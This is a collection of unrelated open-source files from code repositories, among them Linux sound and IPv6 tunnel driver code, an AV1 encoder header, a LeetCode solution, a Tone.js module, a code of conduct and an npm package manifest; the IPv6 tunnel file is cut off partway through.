reg |= CS4398_MUTE_B | CS4398_MUTE_A;
cs4398_write_cached(chip, 4, reg);
update_cs4362a_volumes(chip);
}
static void update_cs43xx_center_lfe_mix(struct oxygen *chip, bool mixed)
{
struct xonar_cs43xx *data = chip->model_data;
u8 reg;
reg = data->cs4362a_regs[9] & ~CS4362A_ATAPI_MASK;
if (mixed)
reg |= CS4362A_ATAPI_B_LR | CS4362A_ATAPI_A_LR;
else
reg |= CS4362A_ATAPI_B_R | CS4362A_ATAPI_A_L;
cs4362a_write_cached(chip, 9, reg);
}
static const struct snd_kcontrol_new front_panel_switch = {
.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
.name = "Front Panel Playback Switch",
.info = snd_ctl_boolean_mono_info,
.get = xonar_gpio_bit_switch_get,
.put = xonar_gpio_bit_switch_put,
.private_value = GPIO_D1_FRONT_PANEL,
};
static int rolloff_info(struct snd_kcontrol *ctl,
struct snd_ctl_elem_info *info)
{
static const char *const names[2] = {
"Fast Roll-off", "Slow Roll-off"
};
return snd_ctl_enum_info(info, 1, 2, names);
}
static int rolloff_get(struct snd_kcontrol *ctl,
struct snd_ctl_elem_value *value)
{
struct oxygen *chip = ctl->private_data;
struct xonar_cs43xx *data = chip->model_data;
value->value.enumerated.item[0] =
(data->cs4398_regs[7] & CS4398_FILT_SEL) != 0;
return 0;
}
static int rolloff_put(struct snd_kcontrol *ctl,
struct snd_ctl_elem_value *value)
{
struct oxygen *chip = ctl->private_data;
struct xonar_cs43xx *data = chip->model_data;
int changed;
u8 reg;
mutex_lock(&chip->mutex);
reg = data->cs4398_regs[7];
if (value->value.enumerated.item[0])
reg |= CS4398_FILT_SEL;
else
reg &= ~CS4398_FILT_SEL;
changed = reg != data->cs4398_regs[7];
if (changed) {
cs4398_write(chip, 7, reg);
if (reg & CS4398_FILT_SEL)
reg = data->cs4362a_regs[0x04] | CS4362A_FILT_SEL;
else
reg = data->cs4362a_regs[0x04] & ~CS4362A_FILT_SEL;
cs4362a_write(chip, 0x04, reg);
}
mutex_unlock(&chip->mutex);
return changed;
}
static const struct snd_kcontrol_new rolloff_control = {
.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
.name = "DAC Filter Playback Enum",
.info = rolloff_info,
.get = rolloff_get,
.put = rolloff_put,
};
static void xonar_d1_line_mic_ac97_switch(struct oxygen *chip,
unsigned int reg, unsigned int mute)
{
if (reg == AC97_LINE) {
spin_lock_irq(&chip->reg_lock);
oxygen_write16_masked(chip, OXYGEN_GPIO_DATA,
mute ? GPIO_D1_INPUT_ROUTE : 0,
GPIO_D1_INPUT_ROUTE);
spin_unlock_irq(&chip->reg_lock);
}
}
static const DECLARE_TLV_DB_SCALE(cs4362a_db_scale, -6000, 100, 0);
static int xonar_d1_mixer_init(struct oxygen *chip)
{
int err;
err = snd_ctl_add(chip->card, snd_ctl_new1(&front_panel_switch, chip));
if (err < 0)
return err;
err = snd_ctl_add(chip->card, snd_ctl_new1(&rolloff_control, chip));
if (err < 0)
return err;
return 0;
}
static void dump_cs4362a_registers(struct xonar_cs43xx *data,
struct snd_info_buffer *buffer)
{
unsigned int i;
snd_iprintf(buffer, "\nCS4362A:");
for (i = 1; i <= 14; ++i)
snd_iprintf(buffer, " %02x", data->cs4362a_regs[i]);
snd_iprintf(buffer, "\n");
}
static void dump_d1_registers(struct oxygen *chip,
struct snd_info_buffer *buffer)
{
struct xonar_cs43xx *data = chip->model_data;
unsigned int i;
snd_iprintf(buffer, "\nCS4398: 7?");
for (i = 2; i < 8; ++i)
snd_iprintf(buffer, " %02x", data->cs4398_regs[i]);
snd_iprintf(buffer, "\n");
dump_cs4362a_registers(data, buffer);
}
static const struct oxygen_model model_xonar_d1 = {
.longname = "Asus Virtuoso 100",
.chip = "AV200",
.init = xonar_d1_init,
.mixer_init = xonar_d1_mixer_init,
.cleanup = xonar_d1_cleanup,
.suspend = xonar_d1_suspend,
.resume = xonar_d1_resume,
.set_dac_params = set_cs43xx_params,
.set_adc_params = xonar_set_cs53x1_params,
.update_dac_volume = update_cs43xx_volume,
.update_dac_mute = update_cs43xx_mute,
.update_center_lfe_mix = update_cs43xx_center_lfe_mix,
.ac97_switch = xonar_d1_line_mic_ac97_switch,
.dump_registers = dump_d1_registers,
.dac_tlv = cs4362a_db_scale,
.model_data_size = sizeof(struct xonar_cs43xx),
.device_config = PLAYBACK_0_TO_I2S |
PLAYBACK_1_TO_SPDIF |
CAPTURE_0_FROM_I2S_2 |
AC97_FMIC_SWITCH,
.dac_channels_pcm = 8,
.dac_channels_mixer = 8,
.dac_volume_min = 127 - 60,
.dac_volume_max = 127,
.function_flags = OXYGEN_FUNCTION_2WIRE,
.dac_mclks = OXYGEN_MCLKS(256, 128, 128),
.adc_mclks = OXYGEN_MCLKS(256, 128, 128),
.dac_i2s_format = OXYGEN_I2S_FORMAT_LJUST,
.adc_i2s_format = OXYGEN_I2S_FORMAT_LJUST,
};
int __devinit get_xonar_cs43xx_model(struct oxygen *chip,
const struct pci_device_id *id)
{
switch (id->subdevice) {
case 0x834f:
chip->model = model_xonar_d1;
chip->model.shortname = "Xonar D1";
break;
case 0x8275:
case 0x8327:
chip->model = model_xonar_d1;
chip->model.shortname = "Xonar DX";
chip->model.init = xonar_dx_init;
break;
default:
return -EINVAL;
}
return 0;
}
| {
"pile_set_name": "Github"
} |
//===-- X86TargetInfo.cpp - X86 Target Implementation ---------------------===//
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
#include "MCTargetDesc/X86MCTargetDesc.h"
#include "llvm/Support/TargetRegistry.h"
using namespace llvm;
Target llvm::TheX86_32Target, llvm::TheX86_64Target;
extern "C" void LLVMInitializeX86TargetInfo() {
RegisterTarget<Triple::x86, /*HasJIT=*/true>
X(TheX86_32Target, "x86", "32-bit X86: Pentium-Pro and above");
RegisterTarget<Triple::x86_64, /*HasJIT=*/true>
Y(TheX86_64Target, "x86-64", "64-bit X86: EM64T and AMD64");
}
| {
"pile_set_name": "Github"
} |
<?php
/*
* This file is part of Sulu.
*
* (c) Sulu GmbH
*
* This source file is subject to the MIT license that is bundled
* with this source code in the file LICENSE.
*/
namespace Sulu\Bundle\DocumentManagerBundle\Tests\Unit\DataFixtures;
use PHPUnit\Framework\TestCase;
use Sulu\Bundle\DocumentManagerBundle\DataFixtures\DocumentExecutor;
use Sulu\Bundle\DocumentManagerBundle\DataFixtures\DocumentFixtureInterface;
use Sulu\Bundle\DocumentManagerBundle\Initializer\Initializer;
use Sulu\Component\DocumentManager\DocumentManager;
use Symfony\Component\Console\Output\BufferedOutput;
class DocumentExecutorTest extends TestCase
{
public function setUp(): void
{
$this->documentManager = $this->prophesize(DocumentManager::class);
$this->initializer = $this->prophesize(Initializer::class);
$this->output = new BufferedOutput();
$this->fixture1 = $this->prophesize(DocumentFixtureInterface::class);
$this->executer = new DocumentExecutor(
$this->documentManager->reveal(),
$this->initializer->reveal(),
$this->output
);
}
/**
* It should purge the workspace if required.
*/
public function testPurge()
{
$this->initializer->initialize($this->output, true)->shouldNotBeCalled();
$this->executer->execute([], true, false, $this->output);
}
/**
* It should initialize the workspace if required.
*/
public function testInitialize()
{
$this->initializer->initialize($this->output, false)->shouldBeCalled();
$this->executer->execute([], false, true, $this->output);
}
/**
* It should execute the fixtures.
*/
public function testLoadFixtures()
{
$this->fixture1->load($this->documentManager->reveal())->shouldBeCalled();
$this->executer->execute([$this->fixture1->reveal()], false, false, $this->output);
}
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright(c) 2019 Intel Corporation
*
* This source code is subject to the terms of the BSD 2 Clause License and
* the Alliance for Open Media Patent License 1.0. If the BSD 2 Clause License
* was not distributed with this source code in the LICENSE file, you can
* obtain it at https://www.aomedia.org/license/software-license. If the Alliance for Open
* Media Patent License 1.0 was not distributed with this source code in the
* PATENTS file, you can obtain it at https://www.aomedia.org/license/patent-license.
*/
#ifndef EbEncodeContext_h
#define EbEncodeContext_h
#include <stdio.h>
#include "EbDefinitions.h"
#include "EbSvtAv1Enc.h"
#include "EbPictureDecisionReorderQueue.h"
#include "EbPictureDecisionQueue.h"
#include "EbPictureManagerQueue.h"
#include "EbPacketizationReorderQueue.h"
#include "EbInitialRateControlReorderQueue.h"
#include "EbPictureManagerReorderQueue.h"
#include "EbCabacContextModel.h"
#include "EbMdRateEstimation.h"
#include "EbPredictionStructure.h"
#include "EbRateControlTables.h"
#include "EbObject.h"
#include "encoder.h"
#include "firstpass.h"
// *Note - the queues are small for testing purposes. They should be increased when they are done.
#define PRE_ASSIGNMENT_MAX_DEPTH 128 // should be large enough to hold an entire prediction period
#define INPUT_QUEUE_MAX_DEPTH 5000
#define REFERENCE_QUEUE_MAX_DEPTH 5000
#define PICTURE_DECISION_PA_REFERENCE_QUEUE_MAX_DEPTH 5000
#define PICTURE_DECISION_REORDER_QUEUE_MAX_DEPTH 2048
#define INITIAL_RATE_CONTROL_REORDER_QUEUE_MAX_DEPTH 2048
#define PICTURE_MANAGER_REORDER_QUEUE_MAX_DEPTH 2048
#define HIGH_LEVEL_RATE_CONTROL_HISTOGRAM_QUEUE_MAX_DEPTH 2048
#define PACKETIZATION_REORDER_QUEUE_MAX_DEPTH 2048
// RC Groups: They should be a power of 2, so we can replace % by &.
// Instead of using x % y, we use x && (y-1)
#define PARALLEL_GOP_MAX_NUMBER 256
#define RC_GROUP_IN_GOP_MAX_NUMBER 512
#define PICTURE_IN_RC_GROUP_MAX_NUMBER 64
typedef struct DpbDependentList
{
int32_t list[1 << MAX_TEMPORAL_LAYERS];
uint32_t list_count;
} DpbDependentList;
typedef struct DPBInfo {
uint64_t picture_number;
int32_t dep_count;
int32_t dep_list0_count;
int32_t dep_list1_count;
uint8_t temporal_layer_index;
EbBool is_displayed;
EbBool is_used;
EbBool is_alt_ref;
DpbDependentList dep_list0;
DpbDependentList dep_list1;
} DPBInfo;
typedef struct FirstPassStatsOut {
FIRSTPASS_STATS* stat;
size_t size;
size_t capability;
} FirstPassStatsOut;
typedef struct EncodeContext {
EbDctor dctor;
// Callback Functions
EbCallback *app_callback_ptr;
EbHandle total_number_of_recon_frame_mutex;
uint64_t total_number_of_recon_frames;
// Overlay input picture fifo
EbFifo *overlay_input_picture_pool_fifo_ptr;
// Output Buffer Fifos
EbFifo *stream_output_fifo_ptr;
EbFifo *recon_output_fifo_ptr;
// Picture Buffer Fifos
EbFifo *reference_picture_pool_fifo_ptr;
EbFifo *pa_reference_picture_pool_fifo_ptr;
// Picture Decision Reorder Queue
PictureDecisionReorderEntry **picture_decision_reorder_queue;
uint32_t picture_decision_reorder_queue_head_index;
//hold undisplayed frame for show existing frame. It's ordered with pts Descend.
EbObjectWrapper *picture_decision_undisplayed_queue[REF_FRAMES];
uint32_t picture_decision_undisplayed_queue_count;
// Picture Manager Pre-Assignment Buffer
uint32_t pre_assignment_buffer_intra_count;
uint32_t pre_assignment_buffer_idr_count;
uint32_t pre_assignment_buffer_scene_change_count;
uint32_t pre_assignment_buffer_scene_change_index;
uint32_t pre_assignment_buffer_eos_flag;
uint64_t decode_base_number;
EbObjectWrapper **pre_assignment_buffer;
uint32_t pre_assignment_buffer_count;
// Picture Decision Circular Queues
PaReferenceQueueEntry **picture_decision_pa_reference_queue;
uint32_t picture_decision_pa_reference_queue_head_index;
uint32_t picture_decision_pa_reference_queue_tail_index;
// Picture Manager Circular Queues
InputQueueEntry ** input_picture_queue;
uint32_t input_picture_queue_head_index;
uint32_t input_picture_queue_tail_index;
ReferenceQueueEntry **reference_picture_queue;
uint32_t reference_picture_queue_head_index;
uint32_t reference_picture_queue_tail_index;
// Initial Rate Control Reorder Queue
InitialRateControlReorderEntry **initial_rate_control_reorder_queue;
uint32_t initial_rate_control_reorder_queue_head_index;
uint32_t dep_q_head;
uint32_t dep_q_tail;
PicQueueEntry **dep_cnt_picture_queue; //buffer to sotre all pictures needing dependent-count clean-up in PicMgr
// High Level Rate Control Histogram Queue
HlRateControlHistogramEntry **hl_rate_control_historgram_queue;
uint32_t hl_rate_control_historgram_queue_head_index;
EbHandle hl_rate_control_historgram_queue_mutex;
// Packetization Reorder Queue
PacketizationReorderEntry **packetization_reorder_queue;
uint32_t packetization_reorder_queue_head_index;
// GOP Counters
uint32_t intra_period_position; // Current position in intra period
uint32_t pred_struct_position; // Current position within a prediction structure
uint32_t elapsed_non_idr_count;
uint32_t elapsed_non_cra_count;
int64_t current_input_poc;
EbBool initial_picture;
uint64_t last_idr_picture; // the most recently occured IDR picture (in decode order)
// Sequence Termination Flags
uint64_t terminating_picture_number;
EbBool terminating_sequence_flag_received;
// Signalling the need for a td structure to be written in the Bitstream - only used in the PK process so no need for a mutex
EbBool td_needed;
// Prediction Structure
PredictionStructureGroup *prediction_structure_group_ptr;
// Rate Control Bit Tables
RateControlTables *rate_control_tables_array;
EbBool rate_control_tables_array_updated;
EbHandle rate_table_update_mutex;
// Speed Control
int64_t sc_buffer;
int64_t sc_frame_in;
int64_t sc_frame_out;
EbHandle sc_buffer_mutex;
EbEncMode enc_mode;
// Rate Control
uint32_t previous_selected_ref_qp;
uint64_t max_coded_poc;
uint32_t max_coded_poc_selected_ref_qp;
// Dynamic GOP
uint32_t previous_mini_gop_hierarchical_levels;
EbObjectWrapper *previous_picture_control_set_wrapper_ptr;
EbHandle shared_reference_mutex;
uint64_t picture_number_alt; // The picture number overlay includes all the overlay frames
EbHandle stat_file_mutex;
//DPB list management
DPBInfo dpb_list[REF_FRAMES];
uint64_t display_picture_number;
EbBool is_mini_gop_changed;
EbBool is_i_slice_in_last_mini_gop;
uint64_t i_slice_picture_number_in_last_mini_gop;
uint64_t poc_map_idx[MAX_TPL_LA_SW];
EbByte mc_flow_rec_picture_buffer[MAX_TPL_LA_SW];
EbByte mc_flow_rec_picture_buffer_saved;
FrameInfo frame_info;
TwoPassCfg two_pass_cfg; // two pass datarate control
RATE_CONTROL rc;
RateControlCfg rc_cfg;
GF_GROUP gf_group;
KeyFrameCfg kf_cfg;
GFConfig gf_cfg;
FIRSTPASS_STATS *frame_stats_buffer;
// Number of stats buffers required for look ahead
int num_lap_buffers;
STATS_BUFFER_CTX stats_buf_context;
SvtAv1FixedBuf rc_twopass_stats_in; // replaced oxcf->two_pass_cfg.stats_in in aom
FirstPassStatsOut stats_out;
} EncodeContext;
typedef struct EncodeContextInitData {
int32_t junk;
} EncodeContextInitData;
/**************************************
* Extern Function Declarations
**************************************/
extern EbErrorType encode_context_ctor(EncodeContext *encode_context_ptr,
EbPtr object_init_data_ptr);
#endif // EbEncodeContext_h
| {
"pile_set_name": "Github"
} |
/// Source : https://leetcode.com/problems/split-array-with-same-average/description/
/// Author : liuyubobobo
/// Time : 2018-03-24
#include <iostream>
#include <vector>
#include <numeric>
#include <unordered_set>
using namespace std;
/// Dynamic Programming
///
/// Suppose the same average is ave, then ave = sum(A) / len(A)
/// Try how many items B contains from 1 to len(A)/2
/// Suppose B contains i items, then sum(B) = i * ave
/// This sub-problem can be solved by dynamic programming
///
/// Time Complexity: O(len(A) * len(A) * sum(A))
/// Space Complexity: O(len(A) * sum(A))
class Solution {
public:
bool splitArraySameAverage(vector<int>& A) {
int m = A.size();
int sum = accumulate(A.begin(), A.end(), 0);
for(int i = 1 ; i <= m/2 ; i ++)
if((sum * i) % m == 0 && ok(A, (sum * i) / m, i))
return true;
return false;
}
private:
bool ok(const vector<int>& A, int c, int num){
vector<unordered_set<int>> dp(c + 1, unordered_set<int>());
dp[0].insert(0);
for(int a: A)
for(int i = c ; i >= a ; i --)
if(dp[i - a].size() != 0)
if(a == 0) { // dp[i-a] is dp[i]
vector<int> tmp(dp[i].begin(), dp[i].end());
for(int i = 0 ; i < tmp.size() ; i ++)
tmp[i] ++;
for(int e: tmp)
dp[i].insert(e);
}
else{
for(int x: dp[i - a])
dp[i].insert(x + 1);
}
return dp[c].find(num) != dp[c].end();
}
};
void print_bool(bool res){
cout << (res ? "True" : "False") << endl;
}
int main() {
vector<int> A1 = {1,2,3,4,5,6,7,8};
print_bool(Solution().splitArraySameAverage(A1));
// true
vector<int> A2 = {3, 1};
print_bool(Solution().splitArraySameAverage(A2));
// false
vector<int> A3 = {18, 10, 5, 3};
print_bool(Solution().splitArraySameAverage(A3));
// false
vector<int> A4 = {2,0,5,6,16,12,15,12,4};
print_bool(Solution().splitArraySameAverage(A4));
// true
return 0;
} | {
"pile_set_name": "Github"
} |
<< conf/
| {
"pile_set_name": "Github"
} |
define(["Tone/core/Tone", "Tone/component/MidSideSplit", "Tone/component/MidSideMerge",
"Tone/component/Compressor"], function(Tone){
"use strict";
/**
* @class Tone.MidSideCompressor applies two different compressors to the mid
* and side signal components. See Tone.MidSideSplit.
*
* @extends {Tone}
* @param {Object} options The options that are passed to the mid and side
* compressors.
* @constructor
*/
Tone.MidSideCompressor = function(options){
options = this.defaultArg(options, Tone.MidSideCompressor.defaults);
/**
* the mid/side split
* @type {Tone.MidSideSplit}
* @private
*/
this._midSideSplit = this.input = new Tone.MidSideSplit();
/**
* the mid/side recombination
* @type {Tone.MidSideMerge}
* @private
*/
this._midSideMerge = this.output = new Tone.MidSideMerge();
/**
* The compressor applied to the mid signal
* @type {Tone.Compressor}
*/
this.mid = new Tone.Compressor(options.mid);
/**
* The compressor applied to the side signal
* @type {Tone.Compressor}
*/
this.side = new Tone.Compressor(options.side);
this._midSideSplit.mid.chain(this.mid, this._midSideMerge.mid);
this._midSideSplit.side.chain(this.side, this._midSideMerge.side);
this._readOnly(["mid", "side"]);
};
Tone.extend(Tone.MidSideCompressor);
/**
* @const
* @static
* @type {Object}
*/
Tone.MidSideCompressor.defaults = {
"mid" : {
"ratio" : 3,
"threshold" : -24,
"release" : 0.03,
"attack" : 0.02,
"knee" : 16
},
"side" : {
"ratio" : 6,
"threshold" : -30,
"release" : 0.25,
"attack" : 0.03,
"knee" : 10
}
};
/**
* Clean up.
* @returns {Tone.MidSideCompressor} this
*/
Tone.MidSideCompressor.prototype.dispose = function(){
Tone.prototype.dispose.call(this);
this._writable(["mid", "side"]);
this.mid.dispose();
this.mid = null;
this.side.dispose();
this.side = null;
this._midSideSplit.dispose();
this._midSideSplit = null;
this._midSideMerge.dispose();
this._midSideMerge = null;
return this;
};
return Tone.MidSideCompressor;
}); | {
"pile_set_name": "Github"
} |
package com.carpentersblocks.data;
import com.carpentersblocks.tileentity.TEBase;
public class FlowerPot {
/**
* 16-bit data components:
*
* [0000] [0000] [00000000]
* Unused Angle Unused
*/
public final static byte COLOR_NATURAL = 0;
public final static byte COLOR_ENRICHED = 1;
/**
* Returns angle as value from 0 to 15.
*/
public static int getAngle(TEBase TE)
{
return (TE.getData() & 0xf00) >> 8;
}
/**
* Sets angle as value from 0 to 15.
*/
public static void setAngle(TEBase TE, int angle)
{
int temp = (TE.getData() & ~0xf00) | (angle << 8);
TE.setData(temp);
}
}
| {
"pile_set_name": "Github"
} |
# Contributor Covenant Code of Conduct
## Our Pledge
In the interest of fostering an open and welcoming environment, we as
contributors and maintainers pledge to making participation in our project and
our community a harassment-free experience for everyone, regardless of age, body
size, disability, ethnicity, sex characteristics, gender identity and expression,
level of experience, education, socio-economic status, nationality, personal
appearance, race, religion, or sexual identity and orientation.
## Our Standards
Examples of behavior that contributes to creating a positive environment
include:
* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community
* Showing empathy towards other community members
Examples of unacceptable behavior by participants include:
* The use of sexualized language or imagery and unwelcome sexual attention or
advances
* Trolling, insulting/derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or electronic
address, without explicit permission
* Other conduct which could reasonably be considered inappropriate in a
professional setting
## Our Responsibilities
Project maintainers are responsible for clarifying the standards of acceptable
behavior and are expected to take appropriate and fair corrective action in
response to any instances of unacceptable behavior.
Project maintainers have the right and responsibility to remove, edit, or
reject comments, commits, code, wiki edits, issues, and other contributions
that are not aligned to this Code of Conduct, or to ban temporarily or
permanently any contributor for other behaviors that they deem inappropriate,
threatening, offensive, or harmful.
## Scope
This Code of Conduct applies both within project spaces and in public spaces
when an individual is representing the project or its community. Examples of
representing a project or community include using an official project e-mail
address, posting via an official social media account, or acting as an appointed
representative at an online or offline event. Representation of a project may be
further defined and clarified by project maintainers.
## Enforcement
Instances of abusive, harassing, or otherwise unacceptable behavior may be
reported by contacting the project team at [email protected]. All
complaints will be reviewed and investigated and will result in a response that
is deemed necessary and appropriate to the circumstances. The project team is
obligated to maintain confidentiality with regard to the reporter of an incident.
Further details of specific enforcement policies may be posted separately.
Project maintainers who do not follow or enforce the Code of Conduct in good
faith may face temporary or permanent repercussions as determined by other
members of the project's leadership.
## Attribution
This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html
[homepage]: https://www.contributor-covenant.org
For answers to common questions about this code of conduct, see
https://www.contributor-covenant.org/faq
| {
"pile_set_name": "Github"
} |
// T4ShieldEvil genrated by blender2ogre 0.6.0
import RTSS/NormalMapping_MultiPass from "RTShaderSystem.material"
material T4ShieldEvil : RTSS/NormalMapping_MultiPass
{
receive_shadows on
technique
{
pass lighting
{
// Override the normal map.
rtshader_system
{
lighting_stage normal_map T4ShieldEvilNormal.png object_space 0 bilinear 1 -1.0
}
}
pass decal
{
ambient 0.8 0.8 0.8 1.0
diffuse 0.65 0.65 0.65 1.0
specular 0.0 0.0 0.0 0.0 2.0
emissive 0.0 0.0 0.0 0.0
texture_unit decalmap
{
texture T4ShieldEvil.png
tex_address_mode wrap
scale 1.0 1.0
colour_op modulate
}
}
}
} | {
"pile_set_name": "Github"
} |
{
"_args": [
[
{
"raw": "extend-shallow@^2.0.1",
"scope": null,
"escapedName": "extend-shallow",
"name": "extend-shallow",
"rawSpec": "^2.0.1",
"spec": ">=2.0.1 <3.0.0",
"type": "range"
},
"/Users/chengwei/PHP/Sites/kafka-site/node_modules/micromatch"
]
],
"_from": "extend-shallow@>=2.0.1 <3.0.0",
"_id": "[email protected]",
"_inCache": true,
"_location": "/extend-shallow",
"_nodeVersion": "0.12.4",
"_npmUser": {
"name": "jonschlinkert",
"email": "[email protected]"
},
"_npmVersion": "2.10.1",
"_phantomChildren": {},
"_requested": {
"raw": "extend-shallow@^2.0.1",
"scope": null,
"escapedName": "extend-shallow",
"name": "extend-shallow",
"rawSpec": "^2.0.1",
"spec": ">=2.0.1 <3.0.0",
"type": "range"
},
"_requiredBy": [
"/braces",
"/expand-brackets",
"/extglob",
"/fill-range",
"/micromatch",
"/nanomatch",
"/regex-not",
"/set-value",
"/snapdragon",
"/to-regex",
"/union-value/set-value"
],
"_resolved": "https://registry.npmjs.org/extend-shallow/-/extend-shallow-2.0.1.tgz",
"_shasum": "51af7d614ad9a9f610ea1bafbb989d6b1c56890f",
"_shrinkwrap": null,
"_spec": "extend-shallow@^2.0.1",
"_where": "/Users/chengwei/PHP/Sites/kafka-site/node_modules/micromatch",
"author": {
"name": "Jon Schlinkert",
"url": "https://github.com/jonschlinkert"
},
"bugs": {
"url": "https://github.com/jonschlinkert/extend-shallow/issues"
},
"dependencies": {
"is-extendable": "^0.1.0"
},
"description": "Extend an object with the properties of additional objects. node.js/javascript util.",
"devDependencies": {
"array-slice": "^0.2.3",
"benchmarked": "^0.1.4",
"chalk": "^1.0.0",
"for-own": "^0.1.3",
"glob": "^5.0.12",
"is-plain-object": "^2.0.1",
"kind-of": "^2.0.0",
"minimist": "^1.1.1",
"mocha": "^2.2.5",
"should": "^7.0.1"
},
"directories": {},
"dist": {
"shasum": "51af7d614ad9a9f610ea1bafbb989d6b1c56890f",
"tarball": "https://registry.npmjs.org/extend-shallow/-/extend-shallow-2.0.1.tgz"
},
"engines": {
"node": ">=0.10.0"
},
"files": [
"index.js"
],
"gitHead": "e9b1f1d2ff9d2990ec4a127afa7c14732d1eec8a",
"homepage": "https://github.com/jonschlinkert/extend-shallow",
"keywords": [
"assign",
"extend",
"javascript",
"js",
"keys",
"merge",
"obj",
"object",
"prop",
"properties",
"property",
"props",
"shallow",
"util",
"utility",
"utils",
"value"
],
"license": "MIT",
"main": "index.js",
"maintainers": [
{
"name": "jonschlinkert",
"email": "[email protected]"
}
],
"name": "extend-shallow",
"optionalDependencies": {},
"readme": "ERROR: No README data found!",
"repository": {
"type": "git",
"url": "git+https://github.com/jonschlinkert/extend-shallow.git"
},
"scripts": {
"test": "mocha"
},
"version": "2.0.1"
}
| {
"pile_set_name": "Github"
} |
/*
* IPv6 tunneling device
* Linux INET6 implementation
*
* Authors:
* Ville Nuorvala <[email protected]>
* Yasuyuki Kozakai <[email protected]>
*
* Based on:
* linux/net/ipv6/sit.c and linux/net/ipv4/ipip.c
*
* RFC 2473
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version
* 2 of the License, or (at your option) any later version.
*
*/
#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
#include <linux/module.h>
#include <linux/capability.h>
#include <linux/errno.h>
#include <linux/types.h>
#include <linux/sockios.h>
#include <linux/icmp.h>
#include <linux/if.h>
#include <linux/in.h>
#include <linux/ip.h>
#include <linux/net.h>
#include <linux/in6.h>
#include <linux/netdevice.h>
#include <linux/if_arp.h>
#include <linux/icmpv6.h>
#include <linux/init.h>
#include <linux/route.h>
#include <linux/rtnetlink.h>
#include <linux/netfilter_ipv6.h>
#include <linux/slab.h>
#include <linux/hash.h>
#include <linux/etherdevice.h>
#include <asm/uaccess.h>
#include <linux/atomic.h>
#include <net/icmp.h>
#include <net/ip.h>
#include <net/ip_tunnels.h>
#include <net/ipv6.h>
#include <net/ip6_route.h>
#include <net/addrconf.h>
#include <net/ip6_tunnel.h>
#include <net/xfrm.h>
#include <net/dsfield.h>
#include <net/inet_ecn.h>
#include <net/net_namespace.h>
#include <net/netns/generic.h>
MODULE_AUTHOR("Ville Nuorvala");
MODULE_DESCRIPTION("IPv6 tunneling device");
MODULE_LICENSE("GPL");
MODULE_ALIAS_RTNL_LINK("ip6tnl");
MODULE_ALIAS_NETDEV("ip6tnl0");
#ifdef IP6_TNL_DEBUG
#define IP6_TNL_TRACE(x...) pr_debug("%s:" x "\n", __func__)
#else
#define IP6_TNL_TRACE(x...) do {;} while(0)
#endif
#define HASH_SIZE_SHIFT 5
#define HASH_SIZE (1 << HASH_SIZE_SHIFT)
static bool log_ecn_error = true;
module_param(log_ecn_error, bool, 0644);
MODULE_PARM_DESC(log_ecn_error, "Log packets received with corrupted ECN");
static u32 HASH(const struct in6_addr *addr1, const struct in6_addr *addr2)
{
u32 hash = ipv6_addr_hash(addr1) ^ ipv6_addr_hash(addr2);
return hash_32(hash, HASH_SIZE_SHIFT);
}
static int ip6_tnl_dev_init(struct net_device *dev);
static void ip6_tnl_dev_setup(struct net_device *dev);
static struct rtnl_link_ops ip6_link_ops __read_mostly;
static int ip6_tnl_net_id __read_mostly;
struct ip6_tnl_net {
/* the IPv6 tunnel fallback device */
struct net_device *fb_tnl_dev;
/* lists for storing tunnels in use */
struct ip6_tnl __rcu *tnls_r_l[HASH_SIZE];
struct ip6_tnl __rcu *tnls_wc[1];
struct ip6_tnl __rcu **tnls[2];
};
static struct net_device_stats *ip6_get_stats(struct net_device *dev)
{
struct pcpu_sw_netstats tmp, sum = { 0 };
int i;
for_each_possible_cpu(i) {
unsigned int start;
const struct pcpu_sw_netstats *tstats =
per_cpu_ptr(dev->tstats, i);
do {
start = u64_stats_fetch_begin_irq(&tstats->syncp);
tmp.rx_packets = tstats->rx_packets;
tmp.rx_bytes = tstats->rx_bytes;
tmp.tx_packets = tstats->tx_packets;
tmp.tx_bytes = tstats->tx_bytes;
} while (u64_stats_fetch_retry_irq(&tstats->syncp, start));
sum.rx_packets += tmp.rx_packets;
sum.rx_bytes += tmp.rx_bytes;
sum.tx_packets += tmp.tx_packets;
sum.tx_bytes += tmp.tx_bytes;
}
dev->stats.rx_packets = sum.rx_packets;
dev->stats.rx_bytes = sum.rx_bytes;
dev->stats.tx_packets = sum.tx_packets;
dev->stats.tx_bytes = sum.tx_bytes;
return &dev->stats;
}
/*
* Locking : hash tables are protected by RCU and RTNL
*/
struct dst_entry *ip6_tnl_dst_check(struct ip6_tnl *t)
{
struct dst_entry *dst = t->dst_cache;
if (dst && dst->obsolete &&
dst->ops->check(dst, t->dst_cookie) == NULL) {
t->dst_cache = NULL;
dst_release(dst);
return NULL;
}
return dst;
}
EXPORT_SYMBOL_GPL(ip6_tnl_dst_check);
void ip6_tnl_dst_reset(struct ip6_tnl *t)
{
dst_release(t->dst_cache);
t->dst_cache = NULL;
}
EXPORT_SYMBOL_GPL(ip6_tnl_dst_reset);
void ip6_tnl_dst_store(struct ip6_tnl *t, struct dst_entry *dst)
{
struct rt6_info *rt = (struct rt6_info *) dst;
t->dst_cookie = rt->rt6i_node ? rt->rt6i_node->fn_sernum : 0;
dst_release(t->dst_cache);
t->dst_cache = dst;
}
EXPORT_SYMBOL_GPL(ip6_tnl_dst_store);
/**
* ip6_tnl_lookup - fetch tunnel matching the end-point addresses
* @remote: the address of the tunnel exit-point
* @local: the address of the tunnel entry-point
*
* Return:
* tunnel matching given end-points if found,
* else fallback tunnel if its device is up,
* else %NULL
**/
#define for_each_ip6_tunnel_rcu(start) \
for (t = rcu_dereference(start); t; t = rcu_dereference(t->next))
static struct ip6_tnl *
ip6_tnl_lookup(struct net *net, const struct in6_addr *remote, const struct in6_addr *local)
{
unsigned int hash = HASH(remote, local);
struct ip6_tnl *t;
struct ip6_tnl_net *ip6n = net_generic(net, ip6_tnl_net_id);
struct in6_addr any;
